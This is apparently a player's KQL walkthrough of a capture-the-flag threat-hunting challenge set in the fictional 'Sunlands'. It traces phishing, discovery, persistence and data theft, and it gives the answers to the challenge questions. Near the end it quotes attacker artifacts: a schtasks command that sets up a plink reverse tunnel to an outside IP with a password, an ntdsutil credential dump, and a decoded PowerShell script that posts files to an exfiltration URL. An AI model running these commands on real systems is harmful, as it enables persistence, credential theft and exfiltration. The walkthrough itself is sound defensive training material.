////////Sunlands: A Tough Space Investigation/////
///Supermassive Black Hole 🪐///
//You notice some security alerts for a file that appears to contain details on the blueprints of the Sunlands' energy grid. Paste the filename.

//let see what tables are given
search *
| distinct $table

//PassiveDns
//SecurityAlerts
//OutboundNetworkEvents
//ProcessEvents
//AuthenticationEvents
//InboundNetworkEvents
////FileCreationEvents
//Email
//Employees

SecurityAlerts
| where description contains "blueprints"
//A suspicious file was quarantined on host NKIG-DESKTOP: EnergyGrid-Blueprints.docx
//hostname': 'NKIG-DESKTOP', 'sha256': '-'
//Response: EnergyGrid-Blueprints.docx

//Which host did the alert from Q1 detect the suspicious file on?
SecurityAlerts
| where description contains "blueprints"
//Response: hostname': 'NKIG-DESKTOP', 'sha256': '-'

//Which employee does the host from Q2 belong to?

Employees
| where hostname =="NKIG-DESKTOP"
//Monica Aguila
//info 10.10.3.181; moaguila ; Intern, monica_aguila@space.gov.su

//The attacker sent the suspicious file to that employee from what email address?
//suspicious doc ; EnergyGrid-Blueprints.docx
Email
| where link contains "EnergyGrid-Blueprints.docx"
//http://renewablesolutionspowergrid.com/share/public/EnergyGrid-Blueprints.docx
//sender urgent@verizon.com and renewable@protonmail.com
// resposnse accepted: urgent@verizon.com

//Look at the email message from Q4. The webmail service of the other attacker email address is headquartered in what country?
Email
| where sender contains "renewable@protonmail.com"
// check the domain name in https://www.whois.com/whois/protonmail.com we have CH (Switzerland)

//What domain did the victim download the file from?

Email
|where recipient contains "monica_aguila@space.gov.su"
| where link contains "EnergyGrid-Blueprints.docx"
//http://renewablesolutionsgriddefender.com/images/search/public/EnergyGrid-Blueprints.docx

//What is the name of the process through which the suspicious file was downloaded?

FileCreationEvents
| where hostname =="NKIG-DESKTOP"
| where filename contains "EnergyGrid-Blueprints.docx"
//hostname NKIG-DESKTOP ANMA-MACHINE KYCA-MACHINE GMTK-MACHINE LENX-MACHINE DGS7-DESKTOP YBAM-MACHINE
//process_name Edge.exe

//How many unique IP addresses does the domain from Q6 resolve to?

PassiveDns
| where domain contains "renewablesolutionsgriddefender.com"
| distinct ip //10

//How many domains do the IP addresses from Q8 resolve to?

let ip_list = datatable(ip: string)
[
"223.87.124.88",
"217.14.27.8",
"106.62.45.33",
"218.129.158.65",
"155.98.31.40",
"16.225.12.208",
"33.114.78.79",
"174.238.73.68",
"76.85.33.80",
"135.228.64.41"
];
PassiveDns
  | where ip in (ip_list)
  |distinct domain
//11
//"renewablesolutionspowergrid.com",
////"energycorp-powergrid.com",
//"renewablesolutions-powergrid.com",
//"energycorpgriddefender.com",
//"renewablesolutions-griddefender.com",
//"griddefenderpowergrid.com",
//"renewablesolutionsgriddefender.com",
//"renewablesolutionsenergycorp.com",
//"renewablesolutions-energycorp.com",
//"griddefender-powergrid.com",
//"energycorp-griddefender.com",

//How many employees visited the domains from Q9?

let domains = datatable(domain: string)
[
  "renewablesolutionspowergrid.com",
  "energycorp-powergrid.com",
  "renewablesolutions-powergrid.com",
  "energycorpgriddefender.com",
  "renewablesolutions-griddefender.com",
  "griddefenderpowergrid.com",
  "renewablesolutionsgriddefender.com",
  "renewablesolutionsenergycorp.com",
  "renewablesolutions-energycorp.com",
  "griddefender-powergrid.com",
  "energycorp-griddefender.com"
];
let userIp = OutboundNetworkEvents
  | where url has_any (domains)
  | project src_ip;
Employees
  | where ip_addr in (userIp)
  | distinct ip_addr //39

//How many unique files were downloaded from the domains from Q9?
let domains = datatable(domain: string)
[
  "renewablesolutionspowergrid.com",
  "energycorp-powergrid.com",
  "renewablesolutions-powergrid.com",
  "energycorpgriddefender.com",
  "renewablesolutions-griddefender.com",
  "griddefenderpowergrid.com",
  "renewablesolutionsgriddefender.com",
  "renewablesolutionsenergycorp.com",
  "renewablesolutions-energycorp.com",
  "griddefender-powergrid.com",
  "energycorp-griddefender.com"
];
OutboundNetworkEvents
  | where url has_any (domains)
  | parse url with "https://renewablesolutionsgriddefender.com/modules/" extracted_path
  | parse url with "https://renewablesolutions-powergrid.com/share/public/" extracted_path1
  | parse url with "https://griddefenderpowergrid.com/modules/" extracted_path2
 | parse url with "http://renewablesolutionspowergrid.com/share/public/" extracted_path3
  | parse url with "http://renewablesolutionsgriddefender.com/share/files/" extracted_path4
    | parse url with "http://renewablesolutionsgriddefender.com/images/search/public/" extracted_path5
    | parse url with "http://renewablesolutions-powergrid.com/share/published/" extracted_path6
    | parse url with "http://renewablesolutions-powergrid.com/public/" extracted_path7
    | parse url with "http://renewablesolutions-powergrid.com/files/files/" extracted_path8
    | parse url with "http://renewablesolutions-energycorp.com/published/search/share/" extracted_path9
    | parse url with "http://griddefenderpowergrid.com/published/share/" extracted_path10
  | extend result = coalesce(extracted_path, extracted_path1, extracted_path2, extracted_path3, extracted_path4, extracted_path5, extracted_path6, extracted_path7, extracted_path8, extracted_path9, extracted_path10)
  | distinct  result
  //5
//RenewableEnergy-Secrets.lnk, EnergyCybersecurity_Report.xlsx, GridDefender_Technical_Doc.xlsx, EnergyGrid-Blueprints.docx, PowerGrid_Security_Report.pdf
//Looking at the files found in Q11, which one was downloaded the most?

let domains = datatable(domain: string)
[
  "renewablesolutionspowergrid.com",
  "energycorp-powergrid.com",
  "renewablesolutions-powergrid.com",
  "energycorpgriddefender.com",
  "renewablesolutions-griddefender.com",
  "griddefenderpowergrid.com",
  "renewablesolutionsgriddefender.com",
  "renewablesolutionsenergycorp.com",
  "renewablesolutions-energycorp.com",
  "griddefender-powergrid.com",
  "energycorp-griddefender.com"
];
OutboundNetworkEvents
  | where url has_any (domains)
  | parse url with "https://renewablesolutionsgriddefender.com/modules/" extracted_path
  | parse url with "https://renewablesolutions-powergrid.com/share/public/" extracted_path1
  | parse url with "https://griddefenderpowergrid.com/modules/" extracted_path2
 | parse url with "http://renewablesolutionspowergrid.com/share/public/" extracted_path3
  | parse url with "http://renewablesolutionsgriddefender.com/share/files/" extracted_path4
    | parse url with "http://renewablesolutionsgriddefender.com/images/search/public/" extracted_path5
    | parse url with "http://renewablesolutions-powergrid.com/share/published/" extracted_path6
    | parse url with "http://renewablesolutions-powergrid.com/public/" extracted_path7
    | parse url with "http://renewablesolutions-powergrid.com/files/files/" extracted_path8
    | parse url with "http://renewablesolutions-energycorp.com/published/search/share/" extracted_path9
    | parse url with "http://griddefenderpowergrid.com/published/share/" extracted_path10
  | extend result = coalesce(extracted_path, extracted_path1, extracted_path2, extracted_path3, extracted_path4, extracted_path5, extracted_path6, extracted_path7, extracted_path8, extracted_path9, extracted_path10)
  | summarize Count = count() by result
  | order by Count desc
  //GridDefender_Technical_Doc.xlsx

//Let's take a look at the employees who downloaded the files from question 11.
//Which role is seen the most?

let domains = datatable(domain: string)
[
  "RenewableEnergy-Secrets.lnk",
  "EnergyCybersecurity_Report.xlsx",
  "GridDefender_Technical_Doc.xlsx",
  "EnergyGrid-Blueprints.docx",
  "PowerGrid_Security_Report.pdf"
];
let user_ips = OutboundNetworkEvents
  | where url has_any (domains)
  | project src_ip;
Employees
  | where ip_addr in (user_ips)
  | summarize Count = count() by role //Intern

//What is the name of the employee who first downloaded one of the files from question 11?

let domains = datatable(domain: string)
[
  "RenewableEnergy-Secrets.lnk",
  "EnergyCybersecurity_Report.xlsx",
  "GridDefender_Technical_Doc.xlsx",
  "EnergyGrid-Blueprints.docx",
  "PowerGrid_Security_Report.pdf"
];
 OutboundNetworkEvents
  | where url has_any (domains)
  | project timestamp, src_ip
//2123-07-16T09:10:07.000Z; 10.10.5.127

Employees
  | where ip_addr == "10.10.5.127"
  | project timestamp, name //Wilbert Wiemer

// also use this query to put all togehter
  let domains = datatable(domain: string)
[
  "RenewableEnergy-Secrets.lnk",
  "EnergyCybersecurity_Report.xlsx",
  "GridDefender_Technical_Doc.xlsx",
  "EnergyGrid-Blueprints.docx",
  "PowerGrid_Security_Report.pdf"
];
let first_access = OutboundNetworkEvents
  | where url has_any (domains)
  | project timestamp, src_ip
  | order by timestamp asc
  | take 1;
Employees
  | where ip_addr in (first_access | project src_ip) // this is nice
  | project name, timestamp

  ///TDMtRDlOeDFYczg9aT91cGduai96YnAucm9oZ2hibC5qamovLzpmY2dndQ==
// I will use cyberchef : from Base64 + reverse + ROT13
// result https://www.youtube.com/watch?v=8fK1kA9Q-3Y (metro boomin- space cadet ft. gunna (s l o w e d + r e v e r b))

///Next section ++++++++++++++++++++++++++Yeeted into space 😱👾

//What is the domain the attackers used to compromise SASA employees interested in the International Space Summit?

//SASA is the name of an imployee

Email
| where link contains "spaceSummit" 
| where recipient contains "SASA"
//Domain: Intlspacesummit2123.info , margaret_hein@intlspacesummit2123.info malicious

SecurityAlerts
| where  description contains "Space" or description contains "Summit" // we have filename and Hostname

//Which top-level domain (TLD) used by the attacker suggests evidence of foreign interference?
//TLD suggests foreign interference (like .ru, .cn, .ir, etc.)
Email
| where sender contains "@intlspacesummit2123.info" 
| distinct 


OutboundNetworkEvents
| where url contains "intlspacesummit2123.info" and url contains "redirect"
| distinct url //27 IPs

// Response is .lu

//What was the most common file (name) that victims downloaded from the attacker domains in Q2?

OutboundNetworkEvents
| where url contains "intlspacesummit2123.info" and url contains "redirect" and url contains ".lu"
| distinct url

let domains =
OutboundNetworkEvents
  | where url contains "https://intlspacesummit2123.info?redirect=" and url contains ".lu"
  | parse url with "https://intlspacesummit2123.info?redirect=" extracted_path
  | distinct extracted_path;
OutboundNetworkEvents
  | where url has_any (domains)
  | where url !contains "https://intlspacesummit2123.info?redirect="
  | parse url with * "files/" filename
  | parse url with * "images/" filename1
  | parse url with * "modules/" filename2
  | parse url with * "online/" filename3
  | parse url with * "public/" filename4
  | parse url with * "published/" filename5
  | parse url with * "search/" filename6
  | parse url with * "share/" filename7
  | extend resultfilename = coalesce(filename, filename1, filename2, filename3, filename4, filename5, filename6, filename7)
  | where resultfilename has_any (".xlsx", ".ppt", ".pdf", ".xls", ".docx")
  | summarize Count = count() by resultfilename
  | order by Count desc
///AsteroidMiningBrief.ppt

////Files downloaded
////AsteroidMiningBrief.ppt	11
////////LunarBaseProject.pdf	5
////SpaceportProposal.docx	4
////SpaceInvestmentProjections.xlsx	4
////SpaceportProposal.docx	1
////SpaceInvestmentProjections.xlsx	1
////AsteroidMiningBrief.ppt	1
////SpaceportProposal.docx	1
////AsteroidMiningBrief.ppt	1

//Right after the victims downloaded the files from Q3, the attackers ran a command to connect to their infrastructure. What is the password?
//check the timestand of the downloaed


  let downloaded_files = datatable(filename: string)
[
  "AsteroidMiningBrief.ppt",
  "LunarBaseProject.pdf",
  "SpaceportProposal.docx",
  "SpaceInvestmentProjections.xlsx"
];
let download_times =
OutboundNetworkEvents
  | where url has_any (downloaded_files)
  | project timestamp, url
  | order by timestamp desc
  | take 1;
ProcessEvents
  | where process_commandline contains "-pw"
  | parse process_commandline with * "-pw " extracted_password " " *
  | distinct extracted_password
  // the password is Aliens!:D

 // The attackers ran commands to discover more about their victims’ network. What is the hostname of the first victim with these commands? This includes compromised hosts that may have been impacted outside of the file in Q3.
//1- we know discovery command has no .exe or c:// lets check
// more simple way 
ProcessEvents
  | where process_commandline !contains "C:" and process_commandline !contains ".exe"
  | distinct process_commandline

//Discovery Commands found:

//net share — Lists shared network resources
//netstat -aon — Shows all network connections and owning processes
//nbtstat -n — Displays NetBIOS name table (local names)
//ipconfig /all — Displays all IP configuration details
//nbtstat -s — Lists all NetBIOS sessions with IP addresses

// 2- now which hostname is the first victim with this command?
ProcessEvents
  | where process_commandline has_any ("net share", "netstat -aon", "nbtstat -n", "ipconfig /all", "nbtstat -s")
  | order by timestamp asc
  | take 1
  | project hostname, timestamp, process_commandline
  //OWQK-MACHINE	7/1/2123, 3:00:26 PM	nbtstat -n

//When did the attackers first run a command to maintain their foothold in victim devices despite restarts, changed credentials, and other interruptions?

//Attackers use these to maintain access after restarts/credential changes:

//reg add — Adding to Windows Run registry keys
//schtasks — Creating scheduled tasks
//sc create — Creating services
//Startup folder modifications
//Task Scheduler commands

ProcessEvents
  | where process_commandline has_any ("reg add", "schtasks", "sc create", "wmic")
  | order by timestamp asc
  | take 1
  | project timestamp, hostname, process_commandline
  //2123-07-19T12:00:03.000Z
////***schtasks /create /sc onstart /RU "SYSTEM" /tn "\Microsoft\Windows\Management\Force" /TR "cmd.exe echo y | C:\ProgramData\plink.exe 220.48.128.191 -P 443 -C -N -R 0.0.0.0:4455:127.0.0.1:3389 -l "astr311a" -pw "Aliens!:D" /F"


  //We know that some of the Sunlands bigwigs got compromised by our threat actor, the question is how…find the role that was compromised most frequently with the command from question 6. How many hosts linked to this role were compromised?


let  mostrole = 
ProcessEvents
  | where process_commandline contains "schtasks /create" 
  and process_commandline contains "plink.exe"
  and process_commandline contains "Aliens!:D"
  | project  hostname;
  Employees
  | where hostname  in (mostrole)
  | summarize Count = count() by role
  | order by Count desc 

   //Response : senior intern number of hosts is 175 //(also have Government Liason with 175 hosts)

///One of these compromised hosts was used as a vector to target an OP account with full control of the domain. Which account was successfully compromised?
Employees
| distinct role
 //search for OP 
 //Director of Operations
 //Chief Technology Officer
 //Chief Scientist
 // Lead Researcher
 //Chief Energy Officer
 //Chief Administrator
 //Chief Financial Officer

let compro_hosts = 
ProcessEvents
  | where process_commandline contains "schtasks /create" 
  and process_commandline contains "plink.exe"
  and process_commandline contains "Aliens!:D"
  | project hostname;
AuthenticationEvents
| where hostname has_any (compro_hosts) and result has "successful"
| where username has_any ("admin", "domain")
| join kind=inner (Employees) on $left.hostname == $right.hostname
| where role =="Intern"
| project username, hostname, role
| distinct username
///Response: username : jeburbage_domain_admin (I checked all 7 dinstinct username)

///What account did the actor compromise in order to gain access to the account from Q8?

////////////////////iam here ******************
//below the account access info ""jeburbage_domain_admin""

ProcessEvents
//| take 1
| where username == "jeburbage_domain_admin" //nothing interesting

// check the username in jeburbage_domain_admin to see IP related

AuthenticationEvents
| where username == "jeburbage_domain_admin"
//Src_ip 10.10.0.167 and 10.10.0.236 (hostname: DOMAIN_CONTROLLER_SERVER)
// hostname; 1AHJ-LAPTOP; DOMAIN_CONTROLLER_SERVER; NHY8-MACHINE; 616P-MACHINE

//// check Emplowee with those IP_adres 10.10.0.167 and 10.10.0.236

Employees
| where ip_addr has_any ("10.10.0.167","10.10.0.236" )
| project username, hostname

// we have 2 
// jeburbage	AQW0-MACHINE
// dacusack	B2R8-LAPTOP

// so Response is unsername == dacusack


///S2Q10: What time did the attackers dump credentials?
//Check for Ntds

let pwned_hostnames =
AuthenticationEvents
| where username has_any ('domain_admin','dacusack')
| where result contains "Successful Login"
| distinct hostname;
//FileCreationEvents
//| where hostname in (pwned_hostnames)
ProcessEvents
| where hostname in (pwned_hostnames)
//| where process_commandline contains "snlnds"
//| where process_commandline contains "dump"
| where process_commandline has_any ('Ntds','ntds',@'C:\Windows\Temp')
//2123-07-19T13:43:24.000Z ; ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\4" quit quit
//hostname; DOMAIN_CONTROLLER_SERVER; username jeburbage_domain_admin

////Now that the attacker has full access to the network, what file did they use to stage exfiltration data about the United Sunlands’ sensitive rocket tech and spaceport deal?
 //after searching zip, 7z, rar, with no response , I finally search in ProcessEvents use "bypass or enc" for encription BASE64 if zip is not the solution

  ProcessEvents
| where process_commandline contains "bypass"
| distinct process_commandline

//C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc JigmKCAkc0hlTGxJZFsxXSskU0hlTExpRFsxM10rJ3gnKSkoKCggMzYsIDE

// decode with cyberchef I use Claude AI to help decode

// paste the code to cyberchef + choose fromBASE64, then &(&( $sHeLlId[1]+...  36, 115, 111, 117... then Copy JUST the ASCII numbers part, 
///In a NEW CyberChef tab Paste just the ASCII numbers Add recipe: "From Decimal"Set Delimiter to: ,  (comma space)Click Bake

//$sourcePath = 'C:\Users\Public\Documents\s3cr3ts\'  # Source folder
//$destinationURL = 'http://spaceresearch.as/exfil/'  # Destination URL

//# Get all files recursively in the source directory
//$files = Get-ChildItem -Path $sourcePath -File -Recurse

//# Iterate through each file and send to the external location
//foreach ($file in $files) {
  //  $filePath = $file.FullName
   // $destination = $destinationURL + $file.Name

    //# Use Invoke-RestMethod to send the file via HTTP POST
    //Invoke-RestMethod -Uri $destination -Method Post -InFile $filePath

// check File with this path C:\Users\Public\Documents\s3cr3ts\ you ahve to add contains @"C:\Users\Public\Documents\s3cr3ts\"

   FileCreationEvents
  | where path contains @"C:\Users\Public\Documents\s3cr3ts\"
  | order by timestamp asc
  | project timestamp, filename, path 

//Response : snlnds_s3cr3ts.rar

//Question 12

//The attackers transferred the exfiltrated data to what URL? check question 11 destinationURL
// above the cyberchef conversion
//fromBASE64 +  from Decimal with comma

/// Response http://spaceresearch.as/exfil/